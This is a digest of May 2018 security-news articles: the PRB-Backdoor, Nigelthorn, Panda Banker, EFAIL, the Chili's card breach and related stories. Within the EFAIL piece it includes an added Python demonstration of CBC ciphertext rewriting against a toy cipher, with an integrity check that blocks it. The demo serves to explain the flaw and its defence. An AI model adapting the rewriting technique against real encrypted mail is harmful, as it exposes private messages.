Although execution of the sample in a sandbox did not reveal network communication, the code does include a variable that appears to point to the main domain that the backdoor communicates with to retrieve commands, namely outl00k[.]net.

The researcher discovered that the email address used to register the domain was also used for the domain LinLedin[.]net. The researcher also found the IPs the two domains were resolving to, but no additional information on either of them was discovered.

Looking into the PRB-Backdoor code, the security researcher found functions supposedly related to initial communication and registration with the command and control (C&C) server, along with a function designed to retrieve the browsing history from different browsers, including Chrome, Internet Explorer, and Firefox.

Other functions revealed the backdoor’s ability to steal passwords, write files to disk, read files, update itself, launch a shell, log keystrokes, take screenshots, collect system information, and more.

“The PRB-Backdoor seems to be a very interesting piece of malware that is aimed to run on the victim machine and gather information, steal passwords, log keystrokes and perform many other functions. I could not find any reference to the backdoor or its code in any public source,” the researcher notes.


Facebook Suspends 200 Apps Over Data Misuse
14.5.2018 securityweek Social

Facebook said Monday it has suspended "around 200" apps on its platform as part of an investigation into misuse of private user data.

The investigation was launched after revelations that political consulting firm Cambridge Analytica hijacked data on some 87 million Facebook users as it worked on Donald Trump's 2016 campaign.

"The investigation process is in full swing," said an online statement from Facebook product partnerships vice president Ime Archibong.

"We have large teams of internal and external experts working hard to investigate these apps as quickly as possible. To date thousands of apps have been investigated and around 200 have been suspended -- pending a thorough investigation into whether they did in fact misuse any data."

Archibong added that "where we find evidence that these or other apps did misuse data, we will ban them and notify people via this website."

The revelations over Cambridge Analytica have prompted investigations on both sides of the Atlantic and led Facebook to tighten its policies on how personal data is shared and accessed.

Facebook made a policy change in 2014 limiting access to user data but noted that some applications still had data it had obtained prior to the revision.

"There is a lot more work to be done to find all the apps that may have misused people's Facebook data -- and it will take time," Archibong said.


Behind the Scenes in the Deceptive App Wars
14.5.2018 securityweek IT

All is not well in the app ecosphere. That ecosphere comprises a large number of useful apps that benefit users, and an unknown number of apps that deceive users. The latter are sometimes described as potentially unwanted programs, or PUPs. Both categories need to make money: good apps are upfront about how this is achieved; deceptive apps hide the process.

In recent years there has been an increasing effort to cleanse the ecosphere of deceptive apps. The anti-virus (AV) industry has taken a more aggressive stance in flagging and sometimes removing what it calls PUPs; the Clean Software Alliance (CSA) was founded to help guide app developers away from the dark side; and a new firm, AppEsteem, certifies good apps and calls out bad apps in its ‘Deceptor’ program.

One name figures throughout: Dennis Batchelder. He is currently president of the AV-dominated Anti-Malware Testing Standards Organization (AMTSO); was a leading light in the formation, and until recently a member of the advisory board, of the CSA; and is the founder of AppEsteem.

But there has been a falling out between the CSA and AppEsteem.

The CSA
The CSA was officially launched in the Fall of 2015, although it had already been on the drawing board for over a year. Batchelder was instrumental in getting it started while he was working for Microsoft, where he was director, program management until April 2016.

The CSA was introduced during VB2015 with a joint presentation from Microsoft and Google, demonstrating early support from the industry’s big-hitters.

“As a 501(c)(6) nonprofit trade association,” writes the CSA on its website, “the CSA works to advance the interests of the software development community through the establishment and enforcement of guidelines, policies and technology tools that balance the software industry’s needs while preserving user choice and user control.”

In other words, it seeks to develop an app ecosphere where honest developers can be fairly recompensed, via monetization, for their labor. However, it provides very little information on its website. It does not, for example, list the members of the trade association, nor give any indication on how it will enforce its guidelines and policies on recalcitrant apps.

AppEsteem
Founded by Batchelder in 2016, AppEsteem is primarily an app certification organization – it certifies clean apps. However, since a carrot works best when supported by a stick, AppEsteem also calls out those apps it considers to be deceptive and therefore potentially harmful to users.

Batchelder hoped that the CSA and AppEsteem could work together (he was on the advisory board of the former and is president of the latter). The CSA could provide recommendations and industry support on classification criteria, and AppEsteem – at one step removed – could provide the enforcement element apparently missing in the CSA.

AppEsteem maintains what it calls the ‘deceptor list’; a list of apps that in its own judgement use deceptive means to increase their monetization potential. At the time of writing, there are more than 300 apps on the deceptor list. It also actively encourages AV firms to use this list in their own attempts at blocking PUPs.

There is a difficult balance. Deceptive app developers will object to being included on a public shaming list. Apps that get clean need to be removed in a timely fashion. New methods of deception need to be recognized and included in the bad behavior criteria.

It is, in short, a process wide open for criticism from app developers who are called out.

CSA criticizes AppEsteem
Criticism came last week from an unexpected source – from the CSA. On 10 May 2018, the CSA published a remarkably negative report on AppEsteem’s ‘deceptor’ program titled, CSA Review of AppEsteem Programs. It was, said the CSA, “triggered by a groundswell of complaints and expressions of concern received by the CSA from industry members regarding this program.”

The report is largely – although not entirely – negative. It raises some interesting points. The ‘groundswell of complaints’ is to be expected; particularly from the apps and the app developers called out for being deceptive.

However, concern over some other elements seems valid. AppEsteem does not seem keen to call out AV products, even when they appear to use ‘deceptive’ practices (consider, for example, the ease with which the user can download one product and find that McAfee has also been downloaded).

Furthermore, if certification is annual, a certified app could introduce deceptive practices immediately after certification that would go undetected (would effectively be allowed) for 12 months. “There is no more deceptive or risky behavior than that,” notes the report.

The CSA report makes four proposals. AppEsteem should: refocus efforts on certification; work with the CSA to devise consensus‐built ‘minbar’ criteria; balance violator identification and remediation; and embrace oversight and dispute resolution.

‘Oversight’ implies external management. Refocusing on certification implies abandoning the deceptor app listing. And ‘work with the CSA’ implies that AppEsteem should take its direction from the CSA. If not quite a power grab, the report attempts to neutralize the enforcement element of AppEsteem.

AppEsteem’s response
AppEsteem’s first response was for Batchelder to resign from the CSA advisory board. “I’m unable to figure out how to remain on the CSA Advisory Board in good conscience,” he wrote to the CSA. “Which sucks, as I’ve pushed for CSA to get operational and remain relevant, sent potential members its way, and worked hard to help it succeed. But being an advisor of an incorporator-status organization who is conducting a ‘confidential’ investigation into AppEsteem’s certification program without involving AppEsteem makes no sense at all.”

AppEsteem’s second response was to establish CleanApps.org; which is effectively an alternative to the CSA. “AppEsteem needs CSA,” comments one source who asked to be anonymous, “or at least some organization that can provide guidelines and some kind of oversight of what AppEsteem is doing… It seems that this new player is in fact a company created by Dennis trying to get rid of CSA.”

That partly makes sense. If AppEsteem cannot work with the CSA, it must find a similar organization it can work with. “After I disengaged from CSA,” Batchelder told SecurityWeek, “we realized that AppEsteem had to find a way to get the vendor voice and to reassure them that we’re doing things fairly (the stuff we had hoped CSA would do). So, I incorporated CleanApps.org and recruited its first board from some of our customers (I know, it’s like a soap opera), and then resigned/handed it over once the board launched. Our goal is that once CleanApps.org launches, we’ll give them insight into our operations.”

To the CSA, he wrote in February, “I wanted to let you know that we have determined that it’s in best interests of both ourselves, our customers, and the vendor community if we had oversight and a ‘voice’ specifically representing the vendor community… We won’t become a member or hold any position in CleanApps.org; they will self-govern.” (He has since made it clear that he does not mean ‘oversight’ in any controlling manner.)

AppEsteem’s position seems to be that the app ecosphere requires three organizations: AppEsteem to enforce good behavior among the app developers; the CSA to represent the market in which apps operate; and CleanApps to represent the apps and app developers.

But it is clearly concerned over the current relevance of the CSA. “I think the biggest hole with CSA,” Batchelder told SecurityWeek, “is that they never finished forming: it’s still just… as the only member, and what we felt was that when [that member] had an issue with us, CSA went negative… it’s problematic to us that they’re not formed after four years.”

If AppEsteem needs something like the CSA to be effective, the CSA needs something like AppEsteem to be relevant.

AppEsteem’s third response is a short blog posted on the same day as CSA published its report – Thursday, 10 May 2018. There is no indication of any rapprochement with the CSA. “But we also want to be clear,” writes the author: “if you think it’s fine to treat consumers as exploitable targets for deceptive and aggressive software, we totally understand your desire for us to leave you alone. We strongly suggest you either get on board or find something else to do with your time, as we’re going to continue to tune our Deceptor program to find even more effective ways to disrupt your ability to hurt consumers.”

The way forward
It is hard to see how any outright deceptive app produced by developers simply out to get as much money as possible will ever be persuaded by force of argument alone to abandon deceptive practices. This seems to be the approach of the CSA; and it appears – on the evidence of its website – to have achieved little in its three to four years of existence.

Indeed, the one and only report the CSA has published is the report criticizing AppEsteem. Before that, the previous publication seems to be ‘update #7’, probably written around March 2016.

If the CSA has achieved anything, it is not saying so. At the very least, it could be urged to be more transparent in its operations and achievements – even a list of members would be useful.

Meantime, if the new CleanApps.org gathers pace and support, the CSA itself will become increasingly irrelevant in the battle against deceptive apps; that is, potentially unwanted programs.


Security Gaps Remain as OT, IT Converge
14.5.2018 securityweek IT 

The accelerating digitization of business, driven by compelling commercial arguments, is driving the integration of new information technology (IT) networks with older operational technology (OT) networks. This is introducing new security risks to old technology and old technology practices -- and where the OT is driving a critical manufacturing plant, the new risk is from nation-state actors as well as traditional cyber criminals.

The good news is that many organizations understand the risks and are actively engaged in mitigating those risks. The bad news is the risk mitigation process is far from complete.

Network and content security firm Fortinet commissioned Forrester Consulting to survey the state of converging IT / OT network security. In an associated blog, Fortinet's senior director of product marketing, Peter Newton, explains the cultural difference between IT and OT security: "IT teams have a tendency to just want to throw security technology at the network and call it good. But these networks can be very different, and what works well in one environment can have devastating consequences in the other. For example, an error that opens a port on a switch can have a very different result from one that opens a valve on a boiler."

In January 2018, Forrester queried 429 global decision-makers responsible for the security of their organization’s critical infrastructure from a range of different industries, asking about their IT / OT convergence (PDF) and the security challenges being faced. The result suggests that awareness is high, and steps are in progress (SCADA / ICS security spending is planned to increase by 77%) -- but there is much yet to be done (45% of respondents do not use privileged account management (PAM) for their administrators).

The last issue is particularly relevant given the extent to which converged networks are being opened to third-party suppliers. Sixty-four percent of the companies surveyed provide either complete or high-level access to their SCADA / ICS, including to outsourced suppliers, business partners and government agencies. This seems to be changing, with respondents taking steps to reduce the number of vendors used to provide security functions for IPS, NAC and IoT.

"The number of organizations that now rely on a single vendor to provide a full range of outsourced solutions has jumped from 38% to 47% between 2016 and 2018," comments John Maddison, Fortinet's SVP products and solutions, in a separate blog post.

Coupled with the lack of a PAM solution, the report highlights that 45% of the respondents do not use role-based access control, which provides openings for insider threats. Indeed, internal hackers are considered a greater threat (77% of respondents are extremely or very concerned) than external hackers (70%). The greatest concern is reserved for malware at 77%, with leakage of sensitive or confidential data at 70%.

The security threat is not hypothetical. While there have already been several highly publicized incidents (such as the Ukraine power outages in December 2015 and the U.S. water utility incident in March 2016), the majority of respondents have also experienced a breach. Fifty-six percent of organizations using SCADA / ICS reported a breach in the past year, and only 11% indicated they have never been breached.

SCADA / ICS breaches can have serious consequences. "Sixty-three percent of organizations say the safety of their employees was highly or critically impacted by a SCADA / ICS security breach," notes the report. "Another 58% report major impacts to their organization’s financial stability, and 63% note a serious drag on their ability to operate at a sufficient level."

Solutions to the growing SCADA / ICS risk exist, but require a new approach beyond the traditional IT security approach. IT and OT teams speak different languages for security, comments Newton. Existing OT systems may be running on an obsolete operating system on hardware that is ten or more years old. "But that may be because it only has one job," he explains: "for example, monitoring a thermostat and then throwing a switch when it reaches a critical temperature. That doesn’t require the latest technology, and if it is doing the job it was designed to do, then there is no reason to change it. But because so many of these systems run on proprietary software and use delicate instrumentation, even something as benign as scanning a device for malware can cause it to malfunction."

Solutions do exist, but must be chosen with care. "When considering a security vendor for their SCADA / ICS environments," suggests Newton, "the ability to meet compliance standards and provide end-to-end solutions, along with a reputation for reliability are the most important attributes [the respondents] look for. These organizations are looking for solutions from a variety of vendors, from systems integrators to security manufacturers."


Hackers Divert Funds From Mexico Banks, Amount Unclear: Official
14.5.2018 securityweek Hacking 

Hackers have stolen an unknown amount of money from banks in Mexico in a series of cyber attacks on the country's interbank payments system, an official said Monday.

At least five attacks on the Mexican central bank's Interbank Electronic Payments System (SPEI) were carried out in April and May, said Lorenza Martinez, director general of the corporate payments and services system at the central bank.

"Some transactions were introduced that were not recognized by the issuing bank," she told Radio Centro.

"In some cases these transfers made it through to the destination bank and were withdrawn in cash."

She declined to reveal which banks were targeted.

Some Mexican media outlets have put the amount stolen at 400 million pesos ($20.4 million), but Martinez denied those reports.

"The amount is currently being analyzed. Some of the transfers were stopped, and the funds are currently being returned," she said.

She said the money stolen belonged to the banks themselves and that clients' funds were never affected.

The interbank payments system allows banks to make real-time transfers to each other.

They connect via their own computer systems or an external provider -- the point where the attacks appear to have taken place, Martinez said.

After the attacks were detected, banks switched to a slower but more secure method.

No new attacks have been registered since.


Researchers disclosed details of EFAIL attacks on PGP and S/MIME tools. Experts believe claims are overblown
14.5.2018 securityaffairs Attack

EFAIL attacks: researchers found critical vulnerabilities in PGP and S/MIME tools; the advice is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.
A few hours ago, I reported the news that security researchers from three universities in Germany and Belgium have found critical vulnerabilities in PGP and S/MIME Tools that could be exploited by attackers to read emails encrypted with OpenPGP and S/MIME.

Pretty Good Privacy is the open source end-to-end encryption standard used to encrypt emails, while S/MIME, Secure/Multipurpose Internet Mail Extensions, is an asymmetric cryptography-based technology that allows users to send digitally signed and encrypted emails.

The existence of the vulnerabilities was also confirmed by researchers at the Electronic Frontier Foundation (EFF), which recommended that users uninstall Pretty Good Privacy and S/MIME applications until the issues are fixed.

The experts initially planned on disclosing details on Tuesday morning, but they later decided to publicly share their findings due to wrong information circulating online.

The experts disclosed two variants of the attack, dubbed EFAIL; in both scenarios the attacker needs to be in a position to intercept encrypted emails, for example by hacking the target’s email account or by conducting a man-in-the-middle (MitM) attack.

“The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs.” reads the blog post published by the researchers.

“To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.”

The attacker manipulates the ciphertext in the protected emails and sends a modified message containing custom HTML code to the original receiver or sender.


The first attack technique, dubbed direct exfiltration attack, exploits vulnerabilities in the Apple Mail (for iOS and macOS) and Mozilla Thunderbird email clients. The attacker sends the targeted user a specially crafted multipart email with three HTML body parts. When the victim’s client opens and decrypts the email, the attacker’s code causes the application to send the text to a server controlled by the attacker.

The direct exfiltration technique could be used against both PGP and S/MIME.

The second technique, named a CBC/CFB gadget attack, exploits vulnerabilities in the OpenPGP (CVE-2017-17688) and S/MIME (CVE-2017-17689) specifications. In this scenario the victim needs to be in possession of their private key; if the private key has been lost, the technique cannot be used.

“He then sends the manipulated email to one of the original receivers, or to the original sender. He may hide this by choosing new FROM, DATE and SUBJECT fields, and he may hide the manipulated ciphertext by hiding it within an invisible iFrame. Thus the attack mail the victim receives looks unsuspicious” reads the research paper published by the experts.

“Once he opens the email in his client, the manipulated ciphertext will be decrypted – first the private key of the victim is used to decrypt the session key s, and then this session key is used to decrypt the manipulated ciphertext c. The decrypted plaintext now contains, due to the manipulations, an exfiltration channel (e.g., an HTML hyperlink) that will send the decrypted plaintext as a whole or in parts to the attacker,” researchers wrote in their paper on EFAIL.

The CBC/CFB gadget attack is effective against PGP as well; the researchers observed a success rate of 33%.
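The quoted passage compresses a lot: why does rewriting ciphertext let anyone plant content in the decrypted email at all? In CBC mode each plaintext block is D(C_i) XOR C_(i-1), so whoever knows one plaintext block (MIME boilerplate is guessable) can choose what that block decrypts to by altering the previous ciphertext block, at the cost of turning that previous block into garbage. That is the malleability the EFAIL authors call a gadget, and it is why an integrity check over the plaintext, the MDC that the GnuPG comments quoted further down this page refer to, matters: a client that verifies it refuses the rewritten message, a client that ignores it renders the attacker's block. The following Python is an added illustration, not code from the EFAIL paper or from any mail client. It assumes a toy Feistel block cipher in place of AES (the CBC property does not depend on the cipher), a simplified integrity tag (SHA-256 of the plaintext encrypted alongside it, standing in for OpenPGP's real MDC construction), and a constructed sample message.

```python
"""CBC malleability behind the EFAIL 'gadget', and why an integrity check stops it.
Added illustration; toy Feistel cipher stands in for AES, and a SHA-256 tag
encrypted with the message stands in for OpenPGP's MDC."""
import hashlib
import hmac
import os

BLOCK = 16          # block size in bytes
ROUNDS = 4
TAG = 32            # SHA-256 digest length


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round_fn(key: bytes, half: bytes, i: int) -> bytes:
    # Keyed round function of the toy cipher (NOT a real cipher; AES would go here).
    return hashlib.sha256(key + bytes([i]) + half).digest()[:BLOCK // 2]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:BLOCK // 2], block[BLOCK // 2:]
    for i in range(ROUNDS):                      # balanced Feistel network
        l, r = r, _xor(l, _round_fn(key, r, i))
    return l + r


def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:BLOCK // 2], block[BLOCK // 2:]
    for i in reversed(range(ROUNDS)):
        l, r = _xor(r, _round_fn(key, l, i)), l
    return l + r


def _pad(data: bytes) -> bytes:                  # PKCS#7-style padding
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def _unpad(data: bytes) -> bytes:
    return data[:-data[-1]]


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, _xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        cur = ciphertext[i:i + BLOCK]
        out.append(_xor(block_decrypt(key, cur), prev))   # P_i = D(C_i) XOR C_(i-1)
        prev = cur
    return b"".join(out)


def seal(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Encrypt plaintext || SHA-256(plaintext); the hash is the MDC stand-in."""
    return cbc_encrypt(key, iv, _pad(plaintext + hashlib.sha256(plaintext).digest()))


def open_unchecked(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    """A client that ignores the integrity tag: returns whatever decrypts."""
    return _unpad(cbc_decrypt(key, iv, ciphertext))[:-TAG]


def open_checked(key: bytes, iv: bytes, ciphertext: bytes):
    """A client that honours the tag: returns None (refuses to render) on mismatch."""
    data = _unpad(cbc_decrypt(key, iv, ciphertext))
    body, tag = data[:-TAG], data[-TAG:]
    if not hmac.compare_digest(tag, hashlib.sha256(body).digest()):
        return None
    return body


def rewrite_block(ciphertext: bytes, iv: bytes, index: int,
                  known_plaintext: bytes, chosen: bytes):
    """The CBC gadget: whoever knows plaintext block `index` can make it decrypt to
    `chosen` by XORing the *previous* ciphertext block (the IV when index == 0);
    block index-1 turns into garbage, which is what the integrity tag catches."""
    blocks = [iv] + [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    blocks[index] = _xor(_xor(blocks[index], known_plaintext), chosen)  # C_(index-1)
    return blocks[0], b"".join(blocks[1:])


if __name__ == "__main__":
    key, iv = os.urandom(BLOCK), os.urandom(BLOCK)
    # Constructed sample message; its second block (MIME boilerplate) is assumed guessable.
    msg = b"Content-Type: text/html\r\n\r\nThe quarterly numbers are attached."
    ct = seal(key, iv, msg)
    iv2, ct2 = rewrite_block(ct, iv, 1, msg[16:32], b"ATTACKER-CHOSEN!")
    print("ignores tag :", open_unchecked(key, iv2, ct2))
    print("honours tag :", open_checked(key, iv2, ct2))
```

The injected block is a neutral marker here; in the paper's setting it would be the start of an HTML element, which is the whole of the "exfiltration channel" described in the quote. The point for defenders is the last two lines: the same rewritten ciphertext is accepted by a client that skips the integrity check and rejected by one that enforces it, which is why the GnuPG maintainers' reaction quoted below centres on the MDC rather than on the ciphertext manipulation itself.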

Test results show that the EFAIL attack works against 25 of 35 tested S/MIME email clients and 10 of 28 tested OpenPGP clients.

“Our analysis shows that EFAIL plaintext exfiltration channels exist for 25 of the 35 tested S/MIME email clients and 10 of the 28 tested OpenPGP email clients.” states the blog post.

“While it is necessary to change the OpenPGP and S/MIME standards to reliably fix these vulnerabilities, Apple Mail, iOS Mail and Mozilla Thunderbird had even more severe implementation flaws allowing direct exfiltration of the plaintext that is technically very easy to execute.”

Many security experts downplayed the importance of the EFAIL attack techniques explaining that the attacks work only against buggy email clients.

Robert J. Hansen
@robertjhansen
GnuPG, and/or an email plugin which didn't handle the warning correctly.

We made three statements about the Efail attack at the beginning. We're
going to repeat them here and give a little explanation. Now that we've
explained the situation, we're confident you'll concur in 12/

Robert J. Hansen
@robertjhansen
our judgment.

1. This paper is misnamed. It's not an attack on OpenPGP. It's an
attack on broken email clients that ignore GnuPG's warnings and do silly
things after being warned. 13/

2:38 PM - May 14, 2018

Robert J. Hansen
@robertjhansen
2. This attack targets buggy email clients. Correct use of the MDC
completely prevents this attack. GnuPG has had MDC support since the
summer of 2000. 14/

Robert J. Hansen
@robertjhansen
3. The authors made a list of buggy email clients. It's worth looking
over their list of email clients (found at the very end) to see if yours
is vulnerable. But be careful, because it may not be accurate -- for
example, Mailpile says they're not vulnerable, but the paper 15/

2:38 PM - May 14, 2018

ProtonMail

@ProtonMail
While we think that stories claiming "PGP is vulnerable" are inaccurate (since the issue was reported in 2001 and is a client side problem), we do take the Efail bug seriously. The researchers have said ProtonMail is not impacted. We are performing independent confirmation also.

3:36 PM - May 14, 2018

ProtonMail

@ProtonMail
ProtonMail is safe against the efail PGP vulnerability. The real vulnerability is implementation errors in various PGP clients. PGP (and OpenPGP) is fine. Any service that uses our @openpgpjs library is also safe as long the default settings aren't changed.

1:55 PM - May 14, 2018
EFAIL attacks can be mitigated by not rendering HTML in incoming emails; patches released by email client developers could also prevent the attacks.


Nigelthorn malware infected over 100,000 systems abusing Chrome extensions
14.5.2018 securityaffairs Virus

The Nigelthorn malware has already infected over 100,000 systems in 100 countries by abusing a Google Chrome extension called Nigelify.
A new strain of malware, dubbed Nigelthorn malware because it abuses a Google Chrome extension called Nigelify, has already infected over 100,000 systems in 100 countries, most of them in the Philippines, Venezuela, and Ecuador (Over 75%).

The new malware family is capable of credential theft, cryptomining, click fraud, and other malicious activities.

According to the experts, the threat actor behind this campaign has been active since at least March 2018.

The Nigelthorn malware spreads through links on Facebook: victims are redirected to a fake YouTube page that asks them to download and install a Chrome extension to play the video. Once a victim accepts the installation, the malicious extension is added to their browser.

“Radware has dubbed the malware “Nigelthorn” since the original Nigelify application replaces pictures to “Nigel Thornberry” and is responsible for a large portion of the observed infections.” reads the analysis published by Radware.

“The malware redirects victims to a fake YouTube page and asks the user to install a Chrome extension to play the video.”


The malware was specifically developed to target both Windows and Linux machines using the Chrome browser.

When a victim clicks on “Add Extension”, they are redirected to a Bitly URL and from there to Facebook, where they are prompted to enter their account credentials.

In order to bypass Google Application validation tools, the threat actors used copycat versions of legitimate extensions and injected a short, obfuscated malicious script into them.

“To date, Radware’s research group has observed seven of these malicious extensions, of which it appears four have been identified and blocked by Google’s security algorithms. Nigelify and PwnerLike remain active,” reads the analysis.

After the malicious extension is installed, a JavaScript payload is executed to start the attack by downloading the malware configuration from the command and control (C&C) server, after which a set of requests is deployed.

The Nigelthorn malware is able to steal Facebook login credentials and Instagram cookies. The malware also redirects users to a Facebook API to generate an access token that is then sent to the Command and Control servers.

The malware propagates by using the stolen credentials: it sends the malicious link to the victim’s network either via messages in Facebook Messenger or via a new post that includes tags for up to 50 contacts.

The Nigelthorn malware also downloads a cryptomining tool to the victim’s computer.

“The attackers are using a publicly available browser-mining tool to get the infected machines to start mining cryptocurrencies.” states Radware. “The JavaScript code is downloaded from external sites that the group controls and contains the mining pool. Radware observed that in the last several days the group was trying to mine three different coins (Monero, Bytecoin and Electroneum) that are all based on the “CryptoNight” algorithm that allows mining via any CPU.”

The malicious code uses numerous techniques to gain persistence on the infected system, such as closing the extensions tab if the user attempts to access it, or downloading URI Regex from the C&C and blocking users from accessing Facebook and Chrome cleanup tools or from making edits, deleting posts, and posting comments.

Experts also described a YouTube fraud scheme: a YouTube plugin is downloaded and executed, after which the malware attempts to access the URI “/php3/youtube.php” on the C&C to receive commands to watch, like, or comment on a video, or to subscribe to the page. These actions are likely an attempt to receive payments from YouTube.

“As this malware spreads, the group will continue to try to identify new ways to utilize the stolen assets. Such groups continuously create new malware and mutations to bypass security controls. Radware recommends individuals and organizations update their current password and only download applications from trusted sources,” concludes Radware.


Chili’s restaurant chain is the latest victim of a Payment Card Breach
14.5.2018 securityaffairs  Incident

Brinker International warns customers who recently paid with their payment card at a Chili’s restaurant may have had their financial data stolen by crooks.
On May 11, Brinker International, which operates more than 1,600 Chili’s and Maggiano’s restaurants across 31 countries worldwide, announced that it had suffered a data breach.

“This notice is to make you aware that some Chili’s restaurants have been impacted by a data incident, which may have resulted in unauthorized access or acquisition of your payment card data, and to provide you information on steps you can take to protect yourself and minimize the possibility of misuse of your information.” reads the notice issued by Brinker.

The company issued a notice to warn people who recently used their payment cards at a Chili’s restaurant of a possible data breach. According to the initial investigation, crooks infected payment systems with malware.

Chili’s restaurant

Cybercriminals siphoned payment card data from some Chili’s restaurants between March and April 2018. The malicious code was used to harvest credit and debit card numbers as well as cardholder names from PoS systems in the restaurants.

“Based on the details of the issue currently uncovered, we believe that malware was used to gather payment card information including credit or debit card numbers as well as cardholder names from our payment-related systems for in-restaurant purchases at certain Chili’s restaurants. Currently, we believe the data incident was limited to between March – April 2018; however, we continue to assess the scope of the incident.” continues the note.

“Chili’s does not collect certain personal information (such as social security number, full date of birth, or federal or state identification number) from Guests. Therefore, this personal information was not compromised.”

The company highlighted that it does not collect social security numbers, dates of birth or other personal information. It immediately activated its incident response plan and is currently working with third-party forensic experts to investigate the incident.

Brinker advised customers to monitor their bank and credit card statements for any suspicious activity. Customers can visit a web page set up by the company to receive more information on the data breach and updates on this event.

Major restaurant chains are a privileged target for cybercriminals: last year many companies suffered a data breach, including Amazon’s Whole Foods Market, Arby’s, and Chipotle.


Critical Flaws in PGP and S/MIME Tools – Immediately disable tools that automatically decrypt PGP-encrypted email
14.5.2018 securityaffairs  Attack

Researchers found critical vulnerabilities in PGP and S/MIME Tools, immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.
If you are one of the users of the email encryption tools Pretty Good Privacy and S/MIME there is an important warning for you.

A group of European security experts has discovered a set of critical vulnerabilities in PGP and S/MIME encryption tools that could reveal your encrypted emails in plain text, including ones you sent in the past.

Pretty Good Privacy is the open source end-to-end encryption standard used to encrypt emails, while S/MIME, Secure/Multipurpose Internet Mail Extensions, is an asymmetric cryptography-based technology that allows users to send digitally signed and encrypted emails.

Sebastian Schinzel, a professor of Computer Security at the Münster University of Applied Sciences, warned that Pretty Good Privacy (PGP) might actually allow Pretty Grievous P0wnage due to the vulnerabilities, and the worst news is that currently there are no reliable fixes.

Sebastian Schinzel
@seecurity
We'll publish critical vulnerabilities in PGP/GPG and S/MIME email encryption on 2018-05-15 07:00 UTC. They might reveal the plaintext of encrypted emails, including encrypted emails sent in the past. #efail 1/4

Sebastian Schinzel
@seecurity
There are currently no reliable fixes for the vulnerability. If you use PGP/GPG or S/MIME for very sensitive communication, you should disable it in your email client for now. Also read @EFF’s blog post on this issue: https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilities-require-you-take-action-now … #efail 2/4

8:00 AM - May 14, 2018

The existence of the vulnerabilities was also confirmed by the researchers at the Electronic Frontier Foundation (EFF); the organization also recommended that users uninstall Pretty Good Privacy and S/MIME applications until the issues are fixed.

“A group of European security researchers have released a warning about a set of vulnerabilities affecting users of PGP and S/MIME. EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages.” reads the blog post published by the EFF.

“Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.”

PGP and S/MIME Tools, hacking encryption

The EFF also provided links to guides on how to temporarily disable PGP plug-ins for Thunderbird with Enigmail, Apple Mail with GPGTools, and Outlook with Gpg4win.

“Until the flaws described in the paper are more widely understood and fixed, users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email,” states the advisory.

Schinzel will disclose full details on Tuesday morning at 0700 UTC.


PANDA Banker malware used in several campaigns aimed at banks, cryptocurrency exchanges and social media
14.5.2018 securityaffairs  Virus  Cryptocurrency

Security firm F5 detailed recently discovered campaigns leveraging the Panda Banker malware to target financial institutions, the largest of which aimed at banks in the US.
Researchers at security firm F5 recently detected several campaigns leveraging the Panda Banker malware to target financial institutions; the largest one aimed at banks in the US.

In March, security researchers at Arbor Networks discovered a threat actor targeting financial institutions in Japan using the latest variant of the Panda Banker banking malware (aka Zeus Panda, PandaBot).

Panda Banker was first spotted in 2016 by Fox-IT. It borrows code from the Zeus banking Trojan and is sold as a kit on underground forums. In November 2017, the threat actors behind the Zeus Panda banking Trojan leveraged black-hat Search Engine Optimization (SEO) to push malicious links into search results, focusing on financial-related keyword queries.

The main feature of Panda Banker is the theft of credentials and account numbers; it is able to steal money from victims by implementing a “man in the browser” attack.

According to F5, the malware continues to target Japanese institutions and it is also targeting users in the United States, Canada, and Latin America.

“We analyzed four campaigns that were active between February and May of 2018. The three May campaigns are still active at the time of this writing. Two of the four campaigns are acting from the same botnet version but have different targets and different command and control (C&C) servers.” reads the analysis published by F5.

“Panda is still primarily focused on targeting global financial services, but following the worldwide cryptocurrency hype, it has expanded its targets to online cryptocurrency exchanges and brokerage services. Social media, search, email, and adult sites are also being targeted by Panda.”

Experts observed a spike in the activity associated with the malware in February when the malicious code was used to target financial services and cryptocurrency sites in Italy with screenshots rather than webinjects. With this technique, the attackers are able to spy on user interaction at cryptocurrency accounts.

“The Panda configuration we analyzed from February was marked as botnet “onore2.” This campaign leverage the same attack techniques as previously described, and it is able to keylog popular web browsers and VNC in order to hijack user interaction session and steal personal information.” states the analysis.

Panda-banker-by-industry

In May, the experts monitored three different Panda Banker campaigns each focused on different countries.

One of them, tracked by F5 as botnet “2.6.8,” had targets in 8 industries in North America, most of them (78%) US financial organizations.

“This campaign is also targeting major social media platforms like Facebook and Instagram, as well as messaging apps like Skype, and entertainment platforms like Youtube. Additionally, Panda is targeting Microsoft.com, bing.com, and msn.com,” says F5.

Experts discovered that the same botnet 2.6.8 is also targeting Japanese financial institutions.

Comparison of the two botnet configurations reveals that when Zeus.Panda is targeting Japan, the authors remove the Content Security Policy (CSP) headers (configuration setting remove_csp – 1). The CSP header is a security standard for preventing cross-site scripting (XSS), clickjacking and other code injection attacks that could execute malicious code from an otherwise trusted site.

